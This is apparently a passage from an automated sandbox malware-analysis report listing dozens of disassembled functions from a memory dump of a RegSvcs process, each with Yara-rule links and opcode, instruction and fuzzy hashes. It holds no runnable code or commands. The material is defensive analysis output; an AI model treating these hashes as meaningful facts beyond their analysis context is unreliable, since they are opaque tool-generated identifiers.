                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                  • Instruction ID: 97020ee0ac0e2079222ad37f30b81b6f60ed4f5214682a5f4dfab9acb97c534e
                                                                  • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                  • Instruction Fuzzy Hash: 51018432600106AFF7269B5CCC04B5AFAAAFB45760F058468EE059B168DB71DD80CB90
                                                                  Function 0168A250 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction ID: 20033f328148eb8f0dfc5ec094eb2b87c5adc2392209e56bd2799d653e1002a9
                                                                  • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                  • Instruction Fuzzy Hash: 3B012232404B229BCB319F99DC40A327BA9FF55B60708CB6EFD958B281D331D801CBA0
                                                                  Function 01764940 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bcbcc024ad95cb5b25ccf8b6475e8c0b2cd180f931d426f4f483e19db6df119e
                                                                  • Instruction ID: a3347db391a23de6942b0f653c609738b2ae8536f1d52b040ae6b2afab58459d
                                                                  • Opcode Fuzzy Hash: bcbcc024ad95cb5b25ccf8b6475e8c0b2cd180f931d426f4f483e19db6df119e
                                                                  • Instruction Fuzzy Hash: 1401C4725C16019FC3229F1CDC40E12F7ADEB91774B254259EDAA9B196D630DC41CB90
                                                                  Function 0170E1D0 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b8b5b033ef3453e67906559b8734ce8a82b383d0b292cf372a5dc542b061019
                                                                  • Instruction ID: 384168c6e921ed4ec9e6580d63309ca9972359a99645c72d9c3130570037fc48
                                                                  • Opcode Fuzzy Hash: 2b8b5b033ef3453e67906559b8734ce8a82b383d0b292cf372a5dc542b061019
                                                                  • Instruction Fuzzy Hash: F911CB32241700EFDB26EF09CD80F06BBB9FF54B84F2004A8EA058B6A1C631ED01CA94
                                                                  Function 01696259 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df4f92e3ed781af0cb08236884dce254e142783003ef85bae13c0a1fca27886b
                                                                  • Instruction ID: 7f3733c598d5c02c63476068259c8ce7798841f206e91ef65d636b827606b973
                                                                  • Opcode Fuzzy Hash: df4f92e3ed781af0cb08236884dce254e142783003ef85bae13c0a1fca27886b
                                                                  • Instruction Fuzzy Hash: 24117071941219ABDF25EB64CD52FE9B379BF08714F5081D8A318A61E0D7709E81CF88
                                                                  Function 01716050 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3ea47d635afbd724d4303b31d7d5f87fffb02947bdba677c9f70c794271efa32
                                                                  • Instruction ID: 99f5cba6bf3649133a3fe4ccf3dbadd4c9b80da4f2eaa93fdc741e79c188b544
                                                                  • Opcode Fuzzy Hash: 3ea47d635afbd724d4303b31d7d5f87fffb02947bdba677c9f70c794271efa32
                                                                  • Instruction Fuzzy Hash: 73112973900019ABCB11DB98CC84EEFBB7DEF48254F044166E906E7211EA34EA55CBE4
                                                                  Function 0169208A Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction ID: 8ad076c671f0e734945d452bfe5f251274626dfc4c68dba3adf7342fe4ed4188
                                                                  • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                  • Instruction Fuzzy Hash: 2001F532201200ABEF119A59DC94A92B76FBFC4610F5541A9ED018F346DB718C81C790
                                                                  Function 01726500 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ca5d1b53296f6b48c741f824b1ece600043c0ee1b8efab9b675e54ea8beb8ed
                                                                  • Instruction ID: fae2342e545f2999eb4bc8ed3a328fdbd128a39282f39a902fed3172afe37a0c
                                                                  • Opcode Fuzzy Hash: 0ca5d1b53296f6b48c741f824b1ece600043c0ee1b8efab9b675e54ea8beb8ed
                                                                  • Instruction Fuzzy Hash: 3A11E5326401559FC301CF19C800BA5F7B5FB56314F18815AFC448B315D731EC81CBA0
                                                                  Function 0171C810 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e71271fdcd1afe085225b04f8d9bcbe8e80bbae61117deb2eef8fbff678c0c48
                                                                  • Instruction ID: 7e9cc843357ce191c84bb1279be92b3399ac93d58992bccc03fb44249c951588
                                                                  • Opcode Fuzzy Hash: e71271fdcd1afe085225b04f8d9bcbe8e80bbae61117deb2eef8fbff678c0c48
                                                                  • Instruction Fuzzy Hash: 1211E8B1E002099BCB04DFA9D585AAEBBF9FF58250F10806AA905E7355D674EE01CBA4
                                                                  Function 0173EA60 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e0c19a7af4de530d94f2316036ae8cb2e337efdaadfe5ad5b0c027f4dced4901
                                                                  • Instruction ID: bfcf82a98454827d2232b2be9778bcd14917a82cc35297316b0d7af537a5adf0
                                                                  • Opcode Fuzzy Hash: e0c19a7af4de530d94f2316036ae8cb2e337efdaadfe5ad5b0c027f4dced4901
                                                                  • Instruction Fuzzy Hash: 8E01B132580211ABCB32AB19885093AFBAAFF91660B44846EE1955B612CF20DD82CB91
                                                                  Function 0168C020 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction ID: 5bb38f1d49364825caf8bf15ebb88b41b63089cb00d5b62c78b992fe8a2cdf10
                                                                  • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                  • Instruction Fuzzy Hash: EF01F5321007059FEB22A6AACC04AA7B7EAFFC5254F04851DA9468B640DB71E402CB60
                                                                  Function 016D20F0 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7ca31409bcc2a5d321b5d632895b2afa36ace4e05561f3e8fc96c036bb3f26b
                                                                  • Instruction ID: 876787d950fcc7df0b11dd054375e025db0c8b97fc744f812b33f9cb0b19b364
                                                                  • Opcode Fuzzy Hash: f7ca31409bcc2a5d321b5d632895b2afa36ace4e05561f3e8fc96c036bb3f26b
                                                                  • Instruction Fuzzy Hash: 2B116175E0020DEFCB05DFA4CC50FAEBBB6EB44254F008059EA0197290DA359D11CB90
                                                                  Function 016CE5CF Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f534d133fc8c2f8c3c7e7d3782a250ae435b7d66aab668705fb143a47046287f
                                                                  • Instruction ID: f6ca0d1d5275b1c5b02434df1b83dfff8d49ba930cc2b174c8f59cc253a6c20e
                                                                  • Opcode Fuzzy Hash: f534d133fc8c2f8c3c7e7d3782a250ae435b7d66aab668705fb143a47046287f
                                                                  • Instruction Fuzzy Hash: 7201A7B1681A01BFD311BB79CD80E57FBEDFF55664740052DB20983A51DB24EC51CAE4
                                                                  Function 017269C0 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a51be0a596bbe6566f31c5e77313ce28cf55956f56f54836e93cfc20e0738807
                                                                  • Instruction ID: 904718faeb90b37b7c953b0f0e540beb40e53d970d4b059f4997fccd0a175c67
                                                                  • Opcode Fuzzy Hash: a51be0a596bbe6566f31c5e77313ce28cf55956f56f54836e93cfc20e0738807
                                                                  • Instruction Fuzzy Hash: 7E01FC32214216DBC320DF6DC848A67FBB9FF54660F11416AFD59872C0E7309A02C7D1
                                                                  Function 0171C460 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac2ae90984d57558108d5a532e5761e00bbe702fc1d4b1e6ae75ca66d671661f
                                                                  • Instruction ID: a5be662d0d37a0de30aeddb0cb9c68368874fab2120483963e73ec0b1e21be6c
                                                                  • Opcode Fuzzy Hash: ac2ae90984d57558108d5a532e5761e00bbe702fc1d4b1e6ae75ca66d671661f
                                                                  • Instruction Fuzzy Hash: C4115B75A40209EBDB15EFA8C844EAEBBB6EB58250F004099FD0197354DA34EE11CB90
                                                                  Function 0171C97C Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: edaf3863e8afa92c6c6164ca13f599e9722cb7a60e9771a34750434c12c5128b
                                                                  • Instruction ID: 25b0ec0f7eebaf59122ce2bc3652e87690700db9e57efc9b8badb741ab29f22b
                                                                  • Opcode Fuzzy Hash: edaf3863e8afa92c6c6164ca13f599e9722cb7a60e9771a34750434c12c5128b
                                                                  • Instruction Fuzzy Hash: 271179B1A083089FC700DF69C841A5BBBE4EF98310F00855EB998D7390E630E900CB96
                                                                  Function 0171CA11 Relevance: .0, Instructions: 48COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6c0e8c2f07e7be2682799e4544f098c80a8afaf7799f35ab58b1aba49cbf6783
                                                                  • Instruction ID: 2a7884563ca8fdda65dd342f3f8195b6086d042d37b4e42528d03b792411a6a3
                                                                  • Opcode Fuzzy Hash: 6c0e8c2f07e7be2682799e4544f098c80a8afaf7799f35ab58b1aba49cbf6783
                                                                  • Instruction Fuzzy Hash: FD1139B2A183099FC710DFADD841A5BBBE4FF99750F00855EB958D73A4E630E900CB96
                                                                  Function 016AE016 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction ID: b8139a9bb6da7429e852725a7173b513676f95a90b8ede58ab507c4e41bb3cea
                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                  • Instruction Fuzzy Hash: C6018B32241680DFE322971DCD48F26BBE8EF54B54F4904A2F905CB7A1D779DC51CA61
                                                                  Function 0168826B Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 82538a3a9e40c50a94d6762bd9c42aee7e38808750d658ee090a4902398dd4bf
                                                                  • Instruction ID: aaba32327fb6328c5bdebcd088f63c4a2cd58d6d9433292bd730d630a1b98b9c
                                                                  • Opcode Fuzzy Hash: 82538a3a9e40c50a94d6762bd9c42aee7e38808750d658ee090a4902398dd4bf
                                                                  • Instruction Fuzzy Hash: 6001A232700A09DBDB14FB6EDC149AFB7ADFF80620B958129DA01AB748DE30DD02C6D0
                                                                  Function 0173EB50 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4dc694323bef01f5faeb56cf35ecfd0822014bfe000b9bed3d42c6e8ea163095
                                                                  • Instruction ID: 877d8b14456a1db3312af002fcc2219fdf5320bf738cf24ba03f269e2176a525
                                                                  • Opcode Fuzzy Hash: 4dc694323bef01f5faeb56cf35ecfd0822014bfe000b9bed3d42c6e8ea163095
                                                                  • Instruction Fuzzy Hash: FC018F716C4601AFD3366B1AD850F06FAA9EF95F60F11442EB2469B391DAB0D8818B68
                                                                  Function 01692582 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64ad6c4bbe712850ce75958a0ab2b7d47169a6c968b79f439e301776607d0bd5
                                                                  • Instruction ID: e61582df95e2235d5392e92b18db4be8a5d3e65c371fd0c43d5f6c08446fd9b3
                                                                  • Opcode Fuzzy Hash: 64ad6c4bbe712850ce75958a0ab2b7d47169a6c968b79f439e301776607d0bd5
                                                                  • Instruction Fuzzy Hash: 06F0A433A41A21BBCB31DB5A8D50F57BEAEEB84A90F15402DA60697740DA30ED01CAA0
                                                                  Function 016BC073 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction ID: f16ac41bbd2178fd852403598710dcf152fa57c5f5249d93daf1207c42e5b96e
                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                  • Instruction Fuzzy Hash: 01F062B2A00615ABD334CF4DDC40E57FBEADBD5A90F05812DA655D7320EA31DD05CB90
                                                                  Function 0176634F Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9acbafc6e21426ff3889982f86b913e7e06d0dd970e4128300d27a33400d2c86
                                                                  • Instruction ID: b4e0616fd7a49d7220098440b6711447e96719cf3b563de727fa9bd7e95c21a5
                                                                  • Opcode Fuzzy Hash: 9acbafc6e21426ff3889982f86b913e7e06d0dd970e4128300d27a33400d2c86
                                                                  • Instruction Fuzzy Hash: 32012CB1E10209EBDB04DFAAD951AAEB7F8FF58304F50406AF904E7350D674DA018BA4
                                                                  Function 0168C310 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction ID: b932d029e1adc278e8bdcdabeaead44625f29d8c1bb101c7be2953defcdadd4a
                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                  • Instruction Fuzzy Hash: 82F0FC73205623ABD732365D4C40BABB9968FE1A64F1A4239E2059B340CA618D0396F0
                                                                  Function 0176625D Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70f466c48afa0a97a8ab15035da369a8887c56916b3164d968218ae1c8b52975
                                                                  • Instruction ID: 253d0895cf39d172d4319ea683f39e0e8feda97399bd1fba8d47a53aef48d9fd
                                                                  • Opcode Fuzzy Hash: 70f466c48afa0a97a8ab15035da369a8887c56916b3164d968218ae1c8b52975
                                                                  • Instruction Fuzzy Hash: 73012171E10209EFCB04DFA9D951AAEB7F9EF58314F50806AF904E7351D6749D01CBA4
                                                                  Function 017662D6 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 93ad6aaffc4b69fad8b3de9d9fcb31945d61a64db78834bdff9be4e97ff08f1e
                                                                  • Instruction ID: 124aaa7e0e40ebec965bd9cd9269064d8196cdf5694fbfe28ff1386679986707
                                                                  • Opcode Fuzzy Hash: 93ad6aaffc4b69fad8b3de9d9fcb31945d61a64db78834bdff9be4e97ff08f1e
                                                                  • Instruction Fuzzy Hash: D40121B1E00209EBDB04DFA9D945A9EB7F9EF58304F50806AF914E7350D6749D018BA4
                                                                  Function 016CCA6F Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                  • Instruction ID: 40fb9b95fcd619e015d5fd879d94432be872aeb671b502896770c9c697dd73f9
                                                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                  • Instruction Fuzzy Hash: D201F932600685EBD3239B9DCC09F69FBD9EF51B50F0940A9FE488B791D775C801C655
                                                                  Function 017661E5 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef47760931e103fa78139f6db7472bcf05251a491e948eabc67a9a78f9315006
                                                                  • Instruction ID: 4ce0a1009cfb54db7214a285efa4bbd43960f0c7a2a47c40a7ff6b04fd07c30e
                                                                  • Opcode Fuzzy Hash: ef47760931e103fa78139f6db7472bcf05251a491e948eabc67a9a78f9315006
                                                                  • Instruction Fuzzy Hash: 2D012C71E002499FDB04DFA9D945AAEBBB8AF58310F54405AF901A7390DB74AA01CB99
                                                                  Function 017163C0 Relevance: .0, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                  • Instruction ID: 08a61c6f0108afcc94a3bb5e7fb714876e4548b0e3f543b8f834f0a0ac42f9c7
                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                  • Instruction Fuzzy Hash: E7F0127210001DBFEF019F94DD80DEFBB7EFB55298B104125FA1192160D671DD21ABA0
                                                                  Function 0171A4B0 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bb32b891ea1f262839e6295b3655eb4e6397ea6681efbd20c542e95e1e27e1a3
                                                                  • Instruction ID: 306c7d643aa60d22ef4fa14ad13c60527e29f766f29794986f0eef0d13753ae0
                                                                  • Opcode Fuzzy Hash: bb32b891ea1f262839e6295b3655eb4e6397ea6681efbd20c542e95e1e27e1a3
                                                                  • Instruction Fuzzy Hash: 7F018936105149EBCF129E88D840EDE7F66FB4C664F158101FE1966224C336D970EB81
                                                                  Function 0168C0F0 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                  • Instruction ID: e86c6b652d80f23d5fdf34478e86c0bac92ebd1d952953b55ab3fb6daacd3119
                                                                  • Opcode Fuzzy Hash: 87b9d75aac6e3790da3685da257c9704585e26cee00e06a1e13277dcf8dbe535
                                                                  • Instruction Fuzzy Hash: 92F024712042415BF710AA2DDC91BA3329AE7E0756F25816AEB458B3C1EE70DC0183B4
                                                                  Function 016C656A Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
